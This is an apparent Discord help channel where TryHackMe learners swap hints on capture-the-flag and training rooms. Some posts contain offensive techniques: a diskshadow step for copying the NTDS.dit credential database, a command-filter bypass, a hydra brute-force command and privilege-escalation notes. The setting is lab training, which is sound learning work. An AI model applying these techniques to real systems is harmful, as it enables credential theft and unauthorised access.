Windows Fundamentals 2 Task 2 question 1.
What is the name of the service that lists Systems Internals as the manufacturer?

But nothing in the text or the link provided in the text seems to point me in the right directen.

white tiger
steel pine
#

rep @white tiger

#

Bruh

#

+rep @white tiger

green minnowBOT
#

Gave +1 Rep to @white tiger

blissful halo
#

Hi ! Im having an issue with the catregex room, I cannot find the answer to "
Match all of the filenames of question 4, except "File7" (use the hat symbol)"
I've tried [Ff]ile[1-9^7], [Ff]ile[^7][1-9], [^File7][Ff]ile[1-9] and nothing seems to work

potent blade
#

I am having trouble with task 3 of this room https://tryhackme.com/room/furthernmap

the question is

How would you tell nmap to scan all ports?

and the answer is --version-all but the website is saying that its wrong i searched for other answers too but i found none which are 3 char

lucid junco
#

There is one that is 3 char.

#

man nmap Then look for ports.

potent blade
lucid junco
trail loom
#

i got the flags for the "relevant" room but i want to do know what else i could do with nt authority\system role. or any extra vulnerabilities i can exploit?

potent blade
lucid junco
lucid junco
#

I'm not clicking that.

If you wish to share pictures, you can verify.

#

!docs verify

proud scarabBOT
potent blade
lucid junco
potent blade
serene badger
#

holla, need a nudge for privilege escalation on tomghost room, tried sudo, cronjobs, suid

potent blade
#

i tried -sV its not correct

lucid junco
potent blade
potent blade
serene badger
lucid junco
lucid junco
potent blade
serene badger
#

ohhh

#

hold on

lucid junco
#

Ah, you found the files then? 😄

serene badger
#

bruh

#

am i that stupid

#

open the .pgp file with the pgp private key...

#

ugh

lucid junco
#

No, you're probably over thinking it,

serene badger
#

yeah im tried to priv esc with other things because im overlooking stuff lol

lucid junco
#

So you have access to the files now then?

serene badger
#

not yet

#

trying my best lol, ill update when im stuck again

lucid junco
#

One of them can be done with ||John||

serene badger
#

ok im lost, encryption is a bit of a weak spot

trim sandal
#

I am stuck on the room "Intro PoC Scripting" --> https://tryhackme.com/room/intropocscripting, I don't know how is correct answer for this question: " Which HTTP response header allows us to send an authenticated POST request?". I read, read, read and still I don't know. Any tips?

trail loom
#

can i do anything with netbios-ssn on port 139?

vapid anchor
#

I also read the stupid text like 900 times.

lethal elk
#

=====
Hello guys, I am so confused at room "Wekorra" (https://tryhackme.com/room/wekorra) as follow

  • If I do manual SQLi, I cannot get the table "wp_users" from "wordpress" database
  • But if I use sqlmap, it can detect the table "wp_users"
    → What did I do wrong at here? Why the manual cannot findout the wp_users table?
white salmon
#

I am having trouble with Task 4 Scanning of this room: https://tryhackme.com/room/rpnessusredux#
I'm not getting any vulnerabilities when I scan the Active Machine IP.
I deploy the machine, copy the machine IP, and then do the basic scan with the settings provided. Any idea what I am missing?
I've tried re-deploying the machine, and also read other posts and watched YT videos. I can't see what I am missing.

maiden heron
#

I'm current working on the bonus question on https://tryhackme.com/room/burpsuiteintruder (Automate column_name discovery with BurpSuite Intruder using SQLi) but I don't want to do this without a wordlist. I've been going through /usr/share/wordlists on my attackbox and was unable to find a suitable one. Can anyone point me to where I could find a good list?

#

Thanks

green minnowBOT
#

Gave +1 Rep to @burnt rivet

lethal elk
storm temple
ashen ravine
#

If you still need help I solved it today

white salmon
#

hey can someone help me on task 6 subdomain enumeration

#

I am putting in the exact command but it doesnt work

white salmon
green minnowBOT
#

Gave +1 Rep to @wicked mirage

white salmon
white salmon
white salmon
white salmon
green minnowBOT
#

Gave +1 Rep to @wicked mirage

white salmon
white salmon
#

oh ok

#

i forgot to input the numbers for the size

onyx flower
#

can somebody help me with the room splunk101

#

i am stuck in this q

trail loom
#

why cant i use psexec.py that is used in the walkthrough

signal perch
#

Hi, I have an issue with the room ‘RazorBlack’ . || The issue occurs when I try to copy the ‘NTDS.dit’ to my current folder ( ex: C:\tmp ). Im creating my ‘shadow disk.txt’ and lunch it from the target machine with diskshadow.exe /s c:\tmp\diskshadow.txt and I get the message The shadow copy was successfully exposed as h:'. Then I "import-module" both DLL's 'SeBackupPrivilegeUtils.dll' and 'SeBackupPrivilegeCmdLets.dll' . I can get the 'SYSTEM' file properly however when I try to get the NTDS.dit file with the following command : 'copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite' , I'm getting an error message saying 'it cannot find the path' meaning 'h:\windows\ntds\ntds.dit' is not the correct path. || Any suggestion ?

sage trail
#

Can someone give me a hint about jack room? I found Wordpress users and when i try to bruteforce with rockyou seems taking forever... Am i on right path?
https://tryhackme.com/room/jack

cold eagle
sage trail
cold eagle
serene badger
#

need a lil hint for chill hack room

#

||got a command injection at /secret , found etc/passwd but nothing special there. user apaar has local.txt and that only contains the word rce. thats all|| dont know how to continue for now

#

||hydra?||

vital estuary
serene badger
#

As i said in general

#

Brainblock

#

Jeez thanks dude

vital estuary
#

@serene badger Although you may need to || bypass a filter for certain commands such as l\s -la or c\at index.php||

serene badger
#

Ill read that once ive tried further

#

Heading home for now so could be an hour or 2

tacit steeple
#

I am stuck in OSquery basic. I need hint for these 2 questions.

Which table stores the evidence of process execution in Windows OS?
One of the users seems to have executed a program to remove traces from the disk; what is the name of that program

tacit steeple
sage trail
white salmon
#

Not a hint I need I completed the room but ran into something during that I don't understand and hope someone can help me to. I was doing the Authentication Bypass room section Brute Force and it mentions that if you pipe the output into the username list then you may have to clean up the data first to be able to user the list. So I tried it as it was piped and it didn't work. I then opened with nano but there were special characters - why is this? I cleared all the extra formatting leaving only the usernames, saved and tried again but it didn't work and wouldn't work or show out put with cat. In the end I just created the list with gedit. So how come nano had special characters when it was direct from the output and why when I removed it did show with cat? It looked like this in Nano: ^[[2Kusername.

sweet hearth
#

does anyone know how to get the shell to get the flag for the third question on task 1 of "AV Evasion: Shellcode"?

wooden rampart
regal tendon
#

looking at the room Theseus - stuck on the final part of it, after ||getting a session as the ariadne user||. There is a file I can't make sense of, and a private key I can't use. Anyone want to drop me a hint?

rotund meadow
maiden heron
#

In the room Simple CTF (https://tryhackme.com/room/easyctf), can someone point me to where I could find information on the privilege escalation part (Second to last question)?

lucid junco
maiden heron
lucid junco
maiden heron
#

Thank you for the list C: Skipping the spoiler for now.

green minnowBOT
#

Gave +1 Rep to @burnt rivet

maiden heron
#

Figured it out happyIza

graceful yew
white salmon
#

For Pyramid of Pain - I found the answer that was is a ASN. I've tried a dozen searches but all that comes up is "autonomous system" is this what the ASN is that is being referred to in the quiz question?

"What is the ASN for the third IP address observed?"

sleek tide
#

cn some tel me the ans of bank oage

stuck fractal
white salmon
#

hey, I need a nudge regarding "Crypted"

charred plover
#

im struggling to get anything at all cracked with hashcat. if I have a hash that something like $<1char>$<10chars>.<29chars>.<4chars>/<10chars>.<40chars>, other than using the first few chars for choosing the mode, how do I make sense of what the rest of the hash is? Seems the second part is the salt... how do I specify salt with hashcat? also with a bit more googling it looks like '/' is a potential output character for sha...

grand nebula
#

For Pyramid of Pain, can someone help me? It's the only response missing:

Use your OSINT skills and provide the name of the malicious document associated with the dropped binary

hallow linden
#

@grand nebula so what did you use in the question "Using your OSINT skills, what is the name of the malicious document associated with the dropped binary?"

#

@grand nebula actually not that one but "Use the tools introduced in task 2 and provide the name of the malware associated with the IP address"

#

@grand nebula for a more specific hint look at the screenshot just above the questions, don't you find it familiar?

grand nebula
#

Yeah I was looking for some hints, i've realized than its a tricky question

hallow linden
#

@grand nebula not at wall, it's so basic you will facepalm yourself 😄 like I did

#

but yeah the hint is in the screenshot and is a combination of thing that you have done until that point

grand nebula
hallow linden
#

😄

#

do you want me to help a little bit more?

grand nebula
#

I would apreciatte it

#

I'm was like 2 hours trying to figure out the answer before asking for help

hallow linden
#

have you tried <any.run>?

manic grove
#

Either im dumb or Task 9 on Pyramid of pain doesnt want to give me the flag or im just wrong

pure thistle
#

can anybody give me a hint on how to find the decryption key on Crypted room please

scenic jay
glossy perch
#

Like you and many others, only problem with question 3. Any hints appriciated because I'm still stuck.

fresh grove
#

RE: https://tryhackme.com/room/torforbeginners

Access the website below and capture the flag by copying bitcoin address at the bottom of the page!

http://danielas3rtn54uwmofdo3x2bsdifr47huasnmbgqzfrec5ubupvtpid.onion/

The Bitcoin address posted on that page is the incorrect answer.

lucid junco
fresh grove
#

The page did work for me when I opened it.

#
Home

Hello, my name is Daniel and this is my personal website, that I develop in my free time. This site is available as Tor hidden service or via my clearnet proxy danwin1210.de.

This is just the landing page, you can navigate to the pages that interest you most by clicking on the entries in the navigation bar on the left.

You can download my PHP Chat based on LE-CHAT on GitHub. The onion link list script is now also available for download on GitHub. The setup I use for hosting is now also available on GitHub

If you like, what I've built here, you can support me by donating via Monero: 432Z3PTrRso52GHHpmPRpvLhecsnc7EFsVd2TzsCJaNmK4vivDxghRB5yVCj2nzCEGajeF3rBqJ43PcpxRnvZkMs49fufzD , Ethereum: 0xFbd055EEeA3b5a3459FeC6A8FAe631305b1079A0 , or Bitcoin: bc1q8jcfxsmcz7lhk7g9urnzxpwhxsje2n2gz34cya . More options available, just contact me.
#

Was published on the page.

lucid junco
#

The answer the hint.

fresh grove
#

I noticed.

pure umbra
#

Maybe im missing an option on the site. But is it possible to turn off the answer format in rooms on tryhackme? I find it sometimes a bit too helpful and i will just be looking at the length instead of properly reading the question and knowing the answer myself

pure umbra
green minnowBOT
#

Gave +1 Rep to @lucid junco

fresh grove
#

I have a question regarding the room Brute Force Heroes, so I'm wondering before I launch the attack within burpsuit wether or not it will matter if I have switched the foxy proxy off.

#

*Burpsuite.

rustic sphinx
#

And use something like tamper monkey

cloud kelp
#

In the Pyramid of Pain room Task 5 question 2 is asking us to use either metadefender or virustotal to provide the name of the malware associated with the IP address. I entered the IP address 35.214.215.33 and both found it to be safe. Is anyone else getting this?

cloud kelp
glass whale
#

I am having trouble with Task 9 on the Pyramid of Pain room. I have tried everything that makes any sense at all. I have even tried many combinations that make no sense. I can not get the flag. Can someone help me? Thanks in advance.

vital swan
lucid junco
#

The task can be done.

fresh grove
#

Hey guys I'm facing a problem in the gallery room;

mike@gallery:/tmp$ sudo -l
sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
mike@gallery:/tmp$ sudo /bin/bash /opt/rootkit.sh
sudo /bin/bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read
read
Error opening terminal: unknown.
mike@gallery:/tmp$ sudo /bin/bash /opt/rootkit.sh
sudo /bin/bash /opt/rootkit.sh
Would you like to versioncheck, update, list or read the report ? read
read
Error opening terminal: unknown.
vital estuary
#

@fresh grove I believe those are separate. Eg: | sudo -u root /bin/bash | and | sudo - u root /opt/rootkit.sh |

fresh grove
#

Ohh......

#

How come you have added;

"root"
#

???

left thunder
fresh grove
#

This is not an error.

mike@gallery:/tmp$ sudo -l
sudo -l
Matching Defaults entries for mike on gallery:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mike may run the following commands on gallery:
    (root) NOPASSWD: /bin/bash /opt/rootkit.sh
left thunder
fresh grove
#

Yeah I think it's because I didn't upgrade the shell properly some how.

vital estuary
fresh grove
#

I think it had something to do with not upgrading the shell properly @vital estuary I'll have to read up on doing that properly.

vital estuary
fresh grove
#

Not right now....

#

I'm trying to figure out where the public rsa key I created went to @vital estuary .

vital estuary
#

look up upgrading to tty shell

fresh grove
#

I'm working on a different room now 🙂

vital estuary
#

it might have got saved to a hidden folder use ls -la to show all files and folders it should be in .ssh

fresh grove
#

Apparently it went here;

/home/su8z3r0/.ssh/id_rsa
#

Well at least that was the output of;

ssh-keygen

Though when I go to that directory there is only one file in there called "known_hosts"

white salmon
#

Hi there,
I'm kinda stuck on the Lazyadmin CTF.
I've already seen many post about this, I've reached the user flag and trying to leverage the sudo -l weakness I found.
|| I tried to modify /etc/copy.sh file but whatever I do, I always get as answer a password ask from sudo.||
I can't understand how to use what sudo -l return. Does anyone have a small hint to help me a little ? 🥺

lucid junco
frozen compass
#

I can't find answer for this question. Any hints
Machine name : tempest
Task 7
Q: The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?

frozen compass
#

Only this question is left 🥺

frozen compass
hearty frost
#

i havent done that srry

white salmon
lucid junco
white salmon
green minnowBOT
#

Gave +1 Rep to @lucid junco

fresh grove
#

Hi guys I'm working on the Fowsniff CTF room and I'm having trouble with one of the hashes;

a92b8a29ef1183192e3d35187e0cfabd

I used hash-id to find out what it was then got this;

HASH: a92b8a29ef1183192e3d35187e0cfabd

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
#

So then I use Hashcat to try and crack it though nothing.

fleet basin
#

in the Linux Privilege Escalation room at the Kernel Exploit practice did I find the right CVE? i found the following:

woeful plaza
#

HI .. I have started room https://tryhackme.com/room/breachingad Question is : -

What is the username of the third valid credential pair found by the password spraying script?
When I am trying to reach http://ntlmauth.za.tryhackme.com/ through browser , it is not working. I guess DNS is not been configured properly. Tried mentioned way but not working , please help

devout crag
#

Hello everyone I’m learning the Linux fundamentals part 2, trying to login to the SSH but it keep saying wrong password…. “tryhackme” was suppose to be the right password it doesn’t work please does anyone know how I can solve that please ? Thank you

vital estuary
#

@devout crag are you using the attackbox?

#

@woeful plaza have you figured it out yet

#

@fleet basin yes ..

devout crag
left thunder
vital estuary
#

@devout crag ok just to make sure, after you started the attackbox (blue button) you also have to start the machine. (Green button).. then use attackbox to ssh in to machine

old dew
#

hello, I don't understand first question in task 4 of the room "Pyramid Of Pain" under SOC Level 1 learning path

#

I would love hint, I can't find that one "malicious URL"

#

oh actually no, I just refreshed website and now It's working again

#

PRO tip I just learnt: after you suspend system, restart website in order to work xd

hallow shuttle
#

Hey ppl, so I am on my first lessons on TryHackMe and the task where it involves bank transfer. I do enter the right answer that is shown on my account balance but it keeps saying incorrect. I already verified my account so... NotLikeThis

old dew
#

pls provide us with room name and task number

hallow shuttle
old dew
#

what is that "right answer" you entered?

hallow shuttle
#

$767.68 which is the balance after transferring the 2000

old dew
#

so, the question is not asking you how much money you have right now, It gives you a flag which indicates that you have made right move, refresh page and then try to find a word that wasn't there before

#

if you still don't find it you can call me in dm I can show you how to do it, or else I can just provide you with right answer but that is not fun, try to re-read question again and you will figure something out

hallow shuttle
green minnowBOT
#

Gave +1 Rep to @old dew

old dew
#

alright! best of luck

green minnowBOT
#

Gave +1 Rep to @vital estuary

hallow shuttle
green minnowBOT
#

Gave +1 Rep to @old dew

vital estuary
#

@devout crag were you able to ssh into that machine?

devout crag
#

I’m good now

old dew
languid bronze
#

sometimes you need to type your answer not copy paste for validation.

#

sometimes if you copy paste with your clipboard then paste things on your terminal or browsers.

copper timber
#

I'm in task 4 on network services and im running kali linux on oracle virtual box and I am running the right command "smbclient //{ip}/profiles -U -p 445 but after using "anonymous" for the username and not using a password (just hitting enter) it tells me host is unreachable. It worked for the tutorial on youtube. While I could just use the answer from youtube I would rather try to figure this out but I am stumped.

#

Actually it says connection to {ip} failed

hollow hawk
crimson oasis
#

Hey everyone, I'm having trouble with File Upload Vulnerabilities room, Task 8: Bypassing Server-Side Filtering: File Extensions

I'm wondering if there is currently a known bug in this room's vm or if I'm just not on the right track.

Problem
Not trying to give away too many details but I'm noticing when I upload certain file types or file type combinations that I'd expect to work It's telling me File must be chosen before being uploaded.
I've looked at a past walkthrough of this room that was posted back in June and as I expected the file type that I chose to upload to test should have worked.

I've tested this on both the Attack box as well as my vpn and neither have worked.

Appreciate any help/hints you all can throw at me. My DM's are open if you do not want to expose too much about the room.

UPDATE: I restarted the VM and it magically worked 🤦‍♂️

weak epoch
#

Hi, I'm in room Simple CTF, as far a a vector goes is the fact that ssh is running on a non standard port a potential vulnerability? Seems suspicious to me

weak epoch
#

Alright, I'll keep looking

white salmon
#

Task 5 Question 4 on Pyramid of Pain room is messing me up lol

#

There are two of the same questions but with a different answer lengths. I found the answer to the first one

#

{Found it}

#

I search the tryhackme forums and got my answer.

#

The answer was right in front of my face lookin at app.any.run

white salmon
#

Loving it !

#

really teaching you how to spot malicious activity and giving you resources for tools on how to do this ! so freaking amazing!!!

fresh grove
#

Working on REmux The Tmux would someone plz give me a clue for this question?;

How to reattach to a detached tmux session with the session name of "thm"
#

It's mentioned no where in the lesson how to do this.

#
└──╼ $man tmux | grep -i 'detached'
     tmux is a terminal multiplexer: it enables a number of terminals to be created, accessed, and controlled from a single screen.  tmux may be detached from a screen and continue running in the
             clients attached to the session are detached.  If -x is given, send SIGHUP to the parent process of the client as well as detaching the client, typically causing it to exit.  -r signi‐
             When enabled, focus events are requested from the terminal if supported and passed through to applications running in tmux.  Attached clients should be detached and attached again af‐
             If on (the default), the client is detached when the session it is attached to is destroyed.  If off, the client is switched to the most recently active of the remaining sessions.
     client-detached         Run when a client is detached
     [detached (from session ...)]
             The client was detached normally.
     [detached and SIGHUP]
             The client was detached and its parent sent the SIGHUP signal (for example with detach-client -P).
     A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:
#
└──╼ $man tmux | grep -i 'reattach'
     background, then later reattached.
     Each session is persistent and will survive accidental disconnection (such as ssh(1) connection timeout) or intentional detaching (with the ‘C-b d’ key strokes).  tmux may be reattached using:
     The update-environment session option may be used to update the session environment from the client when a new session is created or an old reattached.  tmux also initialises the TMUX variable
     A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:
#

Couldn't find anything in the manual either.

topaz umbra
#

there's nothing after 'A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:' ?

#

seems like the answer would be there x)

fresh grove
#
'A session may be detached using ‘C-b d’ (or by an external event such as ssh(1) disconnection) and reattached with:' 
#

This isn't even in the page.

#

Same as this question.

How to switch between two or more tmux sessions without detaching from the current tmux session?

Nothing in the lesson teaching how to do this.

topaz umbra
#

I cant say I have done this room, can you link it to me? Ill check with you 🙂

fresh grove
#

Okay great !!

#

Thanks so much @topaz umbra 🙂

green minnowBOT
#

Gave +1 Rep to @topaz umbra

fresh grove
fresh grove
#

This room is a disaster !!!!

topaz umbra
#

sorry I got pinged

#

which task is it?

fresh grove
#

I'd have better luck trying to find the pot of gold at the end of the rainbow then being able to find the answers in this lesson.

topaz umbra
#

lots of tasks in this room I see 😄

fresh grove
#

Task two it is.

fresh grove
topaz umbra
#

the texts in general are not super well written I see

#

I see what you're saying

fresh grove
#

Yeah.....

fresh grove
#

The answers are simply not even there.

#

I think someone needs to review that room, it should be reported to staff members.

topaz umbra
#

im just trying a few things, Ive got no experience with tmux pretty much

#

yeah it could do with an upgrade. You can send a feedback mail via #feedback-and-ideas about this room?

#

ok I got the answer but it was pretty much by guessing a bit

fresh grove
#

Especially considering that it is an "info" room.

#

Things like this would easily dissuade new users !!!

topaz umbra
#

so looking at the amount ** for the blanked out answer in combination with the flags in the man page to attach a session + the hint the room gives, I ended up with the correct answer

#

if that is helpful for you 😅

fresh grove
#

I couldn't find many answers for that room, I will go back to it later on.

topaz umbra
#

#

its kind of an old room too

fresh grove
#

Forgot to include the instructions !!!!!

#

Dementia is a scary thing.

#
Quickly scours the internet for all foods that can prevent it.
#

Hey @topaz umbra do you know the site that has bash shell's posted up ?

#

I found it in a room I was doing the other day though now I cannot remember the site.

topaz umbra
tame jackal
#

Hello, i'm doing linux fundamentals part 1, and when starting the machine, the attackbox doesn't spawn, and when trying to log via ssh to user linuxfundpart1v1 it ask's for a password, so i can't acces to the machine to answer the questions

tame jackal
#

yeah but it soesn't spawn when starting the machine

lucid junco
#

Look up the top, there might a be "slow split screen" button

tame jackal
#

oh ok that was it, thanks, looked the tutorial and the split view spawned when he started the machine, didn't knew i had to do that

lucid junco
#

Plus it's an old video, so they might have changed it since then.

charred plover
#

in windowsprivesc20 room under abusing service misconfigs, im finding that the part where it states "you have been assigned privs to restart the service yourself to save time" doesnt seem to be true... i cant restart the service, it let me stop it, but wont let me start it.

#

am I missing something here?

charred plover
#

now things are acting weird... i cant get access to the machine after trying to start over... rustscan says port 3389 isnt even open lol

main pumice
#

successfully performed the DOM XSS question but no flag reveal.... any clues?

#

(OWASP Juice Shop, Task 7)

main pumice
#

Success using Kali VM rather than browser attackbox 😦

fresh grove
#

I'm working on the JavaScripts Basic room, task 8 question one. Can someone give me a clue plz.
I've tried the different types mentioned in the lesson;

The three most common types that I've seen of XSS are DOM-Based XSS (type-0 XSS), Reflected XSS (Non-Persistent XSS), and Stored XSS (Persistent XSS):

I still couldn't figure it out.

pastel charm
#

hello there i am in ra2 AD didn't get anything on responder

steady stratus
#

-ban 1040267661134790719 -ddays 1 spreading grabify links

green minnowBOT
#

🔨 Banned 1040267661134790719 indefinitely

fathom mortar
#

Hello, someone can give me a tip for room: Basic Malware RE - challange 1

broken swift
#

What do you need to access a web application ? (on path: Intro to Cyber Security, room: Web Application Security) it sounds like a simple question, but I do not know why whatever I input the answer is wrong

humble mist
#

Hi. I am doing Linux Fundamentals part 3, task 8 and I have a problem in finding the folder Apache2 they say.
apache2 does not appear in the folder /var/log in the Linex machine given by the page

violet olive
#

stuck on this question linux privesc room
Lets replace the contents of the file with our payload using: "echo [MSFVENOM OUTPUT] > autoscript.sh" whats the output is it located elsewhere

#

having trouble catching a shell

charred plover
#

windows local persistance room task 2 - is thmuser0 a typo and supposed to be thmuser1? Im finding the steps and how they relate to the overall goal kinda unclear...

white salmon
#

CCT2019, crypto1c (last challenge/last task). Anyone an idea what it could be? (Compression, encoding or encryption) " 011221121413111121231312222111216212111241122132211121621121131141631132114211211322216222224113213113316112211214131111212313122221112163221214...." I (in total 1022 chars) I've been trying to solve this puzzle for 2 days, but I can't figure it out. IMO could be RGB (w/o numbers 7,8,9) but no idea where to put the separation for the pixel and how to find out the resolution.

vague pine
white salmon
green minnowBOT
#

Gave +1 Rep to @vague pine

bleak scarab
#

hey people!
thanks for your time in advance to whoever will help me out

I am stuck on Linux fundamentals 3, task 6. I just can not figure out when will the crontab run on the terminal to answer the question

I tried writing "12 hours" in every imaginable way (even in french lol)

alpine kestrel
bleak scarab
green minnowBOT
#

Gave +1 Rep to @alpine kestrel

alpine kestrel
#

good luck and have fun

white salmon
#

has anyone completed warzone2?

topaz umbra
#

dedicated to the room

white salmon
#

lol nice, thanks again

topaz umbra
#

haha no worries

weak epoch
#

Evening all. I'm trying out room 'Cyborg' and I'm pretty sure I just got a pair of credentials. I'm assuming they are connected to a 'squid proxy server' that the machine should be hosting. I don't know anything about squid though. Would reading up on the service be aiming in the right direction for the challenge or would I just be barking up the wrong tree?

pine dust
white salmon
vague pine
weak epoch
green minnowBOT
#

Gave +1 Rep to @pine dust

slender tiger
#

task 5

#

oops...^ meant for trying to find txt in this chat....I guess I can ask though. I see a lot of people had trouble with Task5 Q4 in the Pyramid of Pain, and I was able to get that answer before coming here, but Q5 is literally the same question and none of the files in the photo are the answers....what the heck! any hints?

weak epoch
#

Evening. I'm on room "cyborg" I managed to get ssh creds and I'm looking for a vector for privilege escalation. I notice the user is able to run a backup.sh as sudo for these mp3 files. Is this potentially my path to root?

pine dust
sudden zephyr
#

Hey guys

#

i have question about "Road"

#

someone that could possibly help i dont want to open the writeup immediately

topaz umbra
#

just ask the question 🙂 you'll get quicker response

sudden zephyr
#

so

#

i still busy with finding the first entry point

#

i tested ffuf, gobuster, nmap, created an account on the page but didnt find anything till this point

#

what did i miss

#

i can see there is an api

pine dust
sudden zephyr
#

so

#

i found admin@sky.thm on the profile.php page

#

thats all....

pine dust
sudden zephyr
#

got it

#

thanks

compact seal
#

Hello guys

#

what can I do here

woeful crag
#

the key looks wrong there can't be spaces eg

gilded mortar
#

anyone, I can't figure out how to do this, can't seem to match pattern. First I though I'll have to use ^n-z to not involve it in the 4th position of the word but it seems I'm wrong so How do I match the expression for this??

gilded mortar
#

weird but this has been marked as the answer

ruby path
#

doing the UKC room

#

question is about '
What is an example of a tactic to gain a foothold using emails?
'

#

i would think it's delivery, but seems not to be correct

#

small hint maybe?

woeful crag
#

I don't know the answer, but i guess it is more about the technical aspect like what could you deliver to them or what can you fake

ruby path
#

ahhhh ok, now i got it

#

that's phishing of course

#

thanks @woeful crag to enlighten me 😄

green minnowBOT
#

Gave +1 Rep to @woeful crag

ruby path
#

i'm not natively speaking english/american so sometime i interpret the question wrongly

#

but now that you put it another way

woeful crag
#

🙂

timber viper
#

how do i use tryhackme?

#

like how do i work the machine?

#

like wat do i do in it?

left thunder
limpid lintel
#

hi im doing the Year of the rabbit

#

im stuck at rickroll vid ( javascript disabled one not Youtube video one )

#

i watched it

#

it says im in the wrong place

#

i dont rlly knw what to do with ssh and ftp tho

#

|| /intermediary.php?hidden_directory=/WExYY2Cv-qU || i also found this one while testing out in burpsuite

pine dust
limpid lintel
#

it redirected to the rickroll video

pine dust
limpid lintel
#

with this |

#

By adding two bars (||) at the beginning and the end of your spoiler

pine dust
#

|spoiler|

limpid lintel
#

two bars

pine dust
#

Got it

#

You visited ||http://machine-ip/WExYY2Cv-qU/|| right ?

limpid lintel
#

havent yet

#

i only visited || /intermediary.php?hidden_directory=/WExYY2Cv-qU ||

#

also visited || /intermediary.php ||

pine dust
limpid lintel
green minnowBOT
#

Gave +1 Rep to @pine dust

pine dust
#

👍🏻

#

I hope i am not violating any rules.
Please notify me if i am.

edgy acorn
#

room: Jack-of-All-Trades; initial access vector is gained through a long and shitty steg puzzle, but once you get in there is no obvious escalate to root. there is a SUID bit on a binary that allows one to read privileged files via $LFILE, and thus read the root.txt flag. i am not satisfied unless i escalate to root and i dont understand why out of 20 write-ups, no one has done it. i could run dirtyc0w, but that's a cheat IMO. so i found port 25 running locally on 127.0.0.1, which i forwarded via SSH tunnel and found it's Exim 4.84-3 which has a root exploit. however, it does not work locally and i don't think that is a way to root. not sure if anyone wants to help me find a way to root! LMK

short panther
#

Hey! I'm stuck in the MITRE room, Task 8. I identified ||APT33|| as the group, ||Cloud Accounts|| to focus on, specifically the ||ruler|| tool. I also figured out the platforms. But I can't figure out the question starting with "Per the detection tip". Any hints?

short panther
white salmon
short panther
# white salmon Check out MITRE > Cloud Accounts.

Thanks for your pointer. I read the "detection" section of the page several times but wasn't able to figure it out. After running the text of the page through a regex with the format structure (word 8 chars followed by "or" followed by a word with 9 chars and another word with 8 chars), I figured it out. But honestly, I don't think this is an effective question.

green minnowBOT
#

Gave +1 Rep to @cloud shard

short panther
olive glacier
#

hi

white salmon
#

Hi. I’m not looking for a hint specifically but would like to know why my first hydra command didn't work, can anyone help? I've completed this room: https://tryhackme.com/room/hydra

The following is my command I first tired and I see I didn’t properly specify the url: hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.157.160 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

This version returned a list of usernames and passwords (all for ‘molly’)

I see that DarkSec’s walkthrough specified ‘login’ and when I tried it it only showed the one password for molly: hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.157.160 http-post-form “/login:username=^USER^&password=^PASS^:F=incorrect" -V

So I want to know why the first version returned so many passwords for the user molly. I tried some and they didn’t work but the colored syntax made them look like successful ones.

polar finch
pine dust
#

Please point it out if I’m wrong.

polar finch
small pebble
#

Don't feel bad. I'm so confused, I don't know if i'm in the right room @white salmon . I just started last knight and watching the vidio and i feel lost

solar kayak
#

Hello!
Trying to solve the CCT2019 room. Unfortunately I'm stuck on TASK4 - last flag. I have no idea what to do with the string of numbers I have. any hint?

white salmon
wheat loom
#

Click on Go to this report on app.any.run to see the answer to your first question under click connections see the first one under domain

green minnowBOT
#

Gave +1 Rep to @polar finch

velvet lantern
#

Sup guys,

#

Anyone free to help me on snort challenge1 room? stuck on the rule for task 3 number 3

ancient vortex
#

Is this the Snort Rules: Ep.3 – HTTP?

velvet lantern
#

Its in the module 'Snort Challenge - The Basics", and its Task 3 "Writing IDS Rules"

#

Its part of the SOC Level 1 learning path

velvet lantern
#

Figured it out (I was tryna be fancy and make and use $HOME_NET instead of just 'any'), thx tho